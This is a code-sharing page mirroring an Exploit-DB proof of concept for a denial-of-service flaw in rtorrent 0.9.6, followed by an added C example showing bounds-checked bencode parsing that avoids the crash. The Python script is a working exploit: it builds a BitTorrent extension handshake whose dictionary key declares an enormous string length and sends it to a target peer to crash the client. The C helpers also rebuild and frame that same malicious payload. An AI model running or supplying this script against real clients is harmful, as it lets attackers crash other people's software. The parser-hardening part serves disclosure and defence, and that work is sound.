@rcx
Created September 5, 2018 04:46
rtorrent 0.9.6 - Denial of Service (mirror from exploitdb)
# Mirror of https://www.exploit-db.com/exploits/44894/
# Exploit Title: rtorrent 0.9.6 - Denial of Service
# Date: 2018-01-10
# Exploit Author: ecx86
# Vendor Homepage: http://rtorrent.net
# Software Link: https://github.com/rakshasa/rtorrent/releases
# Version: <= 0.9.6
# Tested on: Debian GNU/Linux 9.4 (stretch)
# This crash is due to a bad bencode parse of the handshake data map.
# Specifically, by providing a massive length for a string, namely the key of a map entry,
# malloc fails, returning 0, which is passed to a memcpy call that causes the segfault.
# This can be triggered actively by sending the crash-triggering data to a seeding rtorrent
# client, or when a downloading rtorrent client connects to a malicious peer.
#!/usr/bin/env python3
import socket
import struct

# Target peer (1.3.3.7:6890 is the placeholder from the original PoC; set it to your target)
TARGET = ('1.3.3.7', 6890)

proto_name = b'BitTorrent protocol'
crash = b''
crash += bytes([len(proto_name)]) + proto_name  # pstrlen + pstr (magic)
# reserved extension bytes: eight ASCII '0' (0x30) bytes; 0x30 has bit 0x10 set,
# so reserved[5] advertises BEP 10 extension-protocol support to the peer
crash += b'00000000'
# sha1 hash of info dictionary
# change this depending on your torrent
crash += b'\x00' * 20
crash += b'00000000000000000000'  # peer id (20 bytes)

msg = b''
# struct.pack('<H', 20) yields b'\x14\x00': message id 20 (extended) followed by
# extended message id 0 (extension handshake)
msg += struct.pack('<H', 20)
# payload: bencoded dict whose first key declares an enormous string length
msg += b'd99999999999999999999999999999999:'
crash += struct.pack('>I', len(msg))  # 4-byte big-endian message length prefix
crash += msg

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(TARGET)
s.sendall(crash)
s.close()
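The parse failure the header describes (a bencoded string whose declared length can never be satisfied, so the allocation fails and the result is handed to memcpy) is shown below as an added example written for this page; it is not rtorrent or libtorrent code. It decodes a bencoded string with the two checks the crashing path needs (the decimal length must fit in size_t, and it must not exceed the bytes actually present, so the allocation is never attempted and malloc's NULL is never passed on), validates the length-prefixed extended message the script frames, and builds the same payload shape. The function names, status codes, and the digit-count parameter of build_huge_key_payload are this example's own assumptions, and the inputs it is exercised with are constructed here.

```c
/* Added example (not rtorrent/libtorrent code): bounds-checked bencode string
 * decoding in the shape of the bug above, plus the framing of the "extended"
 * message the script sends. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

enum bdec_status {
    BDEC_OK = 0,
    BDEC_BAD_SYNTAX,    /* not "<digits>:<bytes>" or not a dict */
    BDEC_LEN_OVERFLOW,  /* declared length does not fit in size_t */
    BDEC_TRUNCATED,     /* declared length exceeds the bytes actually present */
    BDEC_OOM,           /* malloc returned NULL; reported, never memcpy'd into */
    BDEC_BAD_MESSAGE    /* frame length or message ids do not match */
};

/* Decode one bencoded string "<len>:<bytes>" from buf[0..remaining).
 * On BDEC_OK *out is a malloc'd NUL-terminated copy and *consumed counts
 * the bytes used; on any error *out stays NULL. */
enum bdec_status bdecode_string(const unsigned char *buf, size_t remaining,
                                char **out, size_t *consumed)
{
    size_t len = 0, i = 0;
    *out = NULL;
    if (remaining == 0 || buf[0] < '0' || buf[0] > '9')
        return BDEC_BAD_SYNTAX;
    while (i < remaining && buf[i] >= '0' && buf[i] <= '9') {
        unsigned d = buf[i] - '0';
        if (len > (SIZE_MAX - d) / 10)   /* len * 10 + d would wrap */
            return BDEC_LEN_OVERFLOW;
        len = len * 10 + d;
        i++;
    }
    if (i >= remaining || buf[i] != ':')
        return BDEC_BAD_SYNTAX;
    i++;
    /* The check the crashing path lacked: a string can never be longer than
     * the bytes that follow its length prefix, so never allocate more. */
    if (len > remaining - i)
        return BDEC_TRUNCATED;
    char *s = malloc(len + 1);
    if (s == NULL)
        return BDEC_OOM;
    memcpy(s, buf + i, len);
    s[len] = '\0';
    *out = s;
    *consumed = i + len;
    return BDEC_OK;
}

/* Decode the first key of a bencoded dict "d<key>...", which is the first
 * thing a handshake-map parser sees. */
enum bdec_status bdecode_first_key(const unsigned char *buf, size_t n, char **key)
{
    size_t used;
    *key = NULL;
    if (n == 0 || buf[0] != 'd')
        return BDEC_BAD_SYNTAX;
    return bdecode_string(buf + 1, n - 1, key, &used);
}

/* Validate one peer message framed as the script frames it: 4-byte
 * big-endian length, message id 20 (extended), extended id 0 (extension
 * handshake), then the bencoded dict; returns the decoder's verdict. */
enum bdec_status check_extended_message(const unsigned char *buf, size_t n, char **key)
{
    *key = NULL;
    if (n < 6)
        return BDEC_BAD_MESSAGE;
    uint32_t len = ((uint32_t)buf[0] << 24) | ((uint32_t)buf[1] << 16) |
                   ((uint32_t)buf[2] << 8) | (uint32_t)buf[3];
    if (len < 2 || len > n - 4)          /* frame must fit in what we hold */
        return BDEC_BAD_MESSAGE;
    if (buf[4] != 20 || buf[5] != 0)
        return BDEC_BAD_MESSAGE;
    return bdecode_first_key(buf + 6, len - 2, key);
}

/* Build the script's payload shape: 'd', ndigits '9's, ':' (constructed
 * input). Returns bytes written, 0 if out is too small. */
size_t build_huge_key_payload(unsigned char *out, size_t cap, size_t ndigits)
{
    if (cap < ndigits + 2)
        return 0;
    out[0] = 'd';
    memset(out + 1, '9', ndigits);
    out[ndigits + 1] = ':';
    return ndigits + 2;
}

/* Frame a payload as the script does: length prefix, id 20, extended id 0. */
size_t frame_extended(const unsigned char *payload, size_t plen,
                      unsigned char *out, size_t cap)
{
    if (plen > UINT32_MAX - 2 || cap < 6 + plen)
        return 0;
    uint32_t len = (uint32_t)(plen + 2);
    out[0] = (unsigned char)(len >> 24); out[1] = (unsigned char)(len >> 16);
    out[2] = (unsigned char)(len >> 8);  out[3] = (unsigned char)len;
    out[4] = 20; out[5] = 0;
    memcpy(out + 6, payload, plen);
    return 6 + plen;
}
```

Two checks are needed, not one: a NULL test after malloc alone would only catch lengths too large to allocate, while a length that is allocatable but larger than the received buffer would still read past it during the copy. Rejecting any declared length larger than the bytes remaining covers both, and the overflow guard while accumulating the decimal keeps a 32-digit length from wrapping into a small, plausible-looking value.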